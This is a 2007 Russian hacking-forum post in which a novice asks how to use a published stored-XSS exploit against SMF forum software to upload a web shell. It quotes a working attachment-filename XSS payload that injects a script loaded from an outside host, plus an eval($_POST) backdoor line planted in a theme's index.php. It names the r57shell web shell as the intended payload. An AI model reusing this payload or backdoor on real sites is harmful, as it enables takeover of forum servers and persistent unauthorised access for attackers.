ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
 
 
Опции темы Поиск в этой теме Опции просмотра

SMF Active XSS (тупой я)
  #1  
Старый 08.07.2007, 14:41
Аватар для Emory
Emory
Новичок
Регистрация: 12.03.2006
Сообщений: 19
Провел на форуме:
150351

Репутация: 29
По умолчанию SMF Active XSS (тупой я)

здрасте пишу тут редко... в основном читаю и пытаюсь сам разобраться... но похоже по жизни я тупой... короче прошу кое-что объснить если не трудно...

решил я сий метод опробовать...
установил SMF 1.1.3 и решил все сделать как написано тут (http://forum.antichat.ru/thread42244-SMF.html)
Значит узнать есть ли в этой версии
"Отсутствует фильтрация atachment filename" я не знал как ... но там написано 1.1.2... поэтому решил посмотреть исправлена ли эта ошибка в 1.1.3 (посмотрел что они изменили) (http://forum.antichat.ru/thread43089-SMF.html)
но там про это ни слова поэтому решил попробовать (я вам грил я нуб)
ну да ладно
значит начал тока готовиться()
тупо скопировал ваш скрипт и тут подумал а нужно ли в нем что либо менять? в принципе это мой первый вопрос... ну короче я ничего не менял сохранил его ну и все... (зы решил я залить шелл)
тут возник еще один вопрос
Код:
name<img src=. width=1 height=1 onerror=javascript:var&#32s=document.createElement('script');s.src='http:  &#47&#47site.com&#47smfexp.js';document.documentElement.firstChild.  appendChild(s);>.txt
вот в этом тоже наверное что либо надо менять? так как посмотрел я на src=. и наверное тут должен быть сам шел... (это мои нубские предположения) (шел я решил взять (r57shell.php)( ps то что я делаю ваще прально??)
и видимо я должен буду туда ссылку на файл подставить? эт уже 3 или 4 вопрос...
еще не понял
Цитата:
По адресу http://vulnsite.com/smf/Themes/default/index.php получаем web shell
index.php который содержит код
Код:
@eval($_POST['cd']);
для чего дан этот код? если шел уже буит работать?

ps сразу грю сильно не ругайтесь...
ps2 я понимаю скорее всего в версии 1.1.3 это уже исправлено но тогда представьте что я это делал на версии 1.1.2 ..хотя бы поясните ост вопросы если не трудно
ps3 заранее пасиб

Последний раз редактировалось Emory; 08.07.2007 в 14:44..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
PsychoStats Active XSS Isis Уязвимости 2 08.04.2007 08:22
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ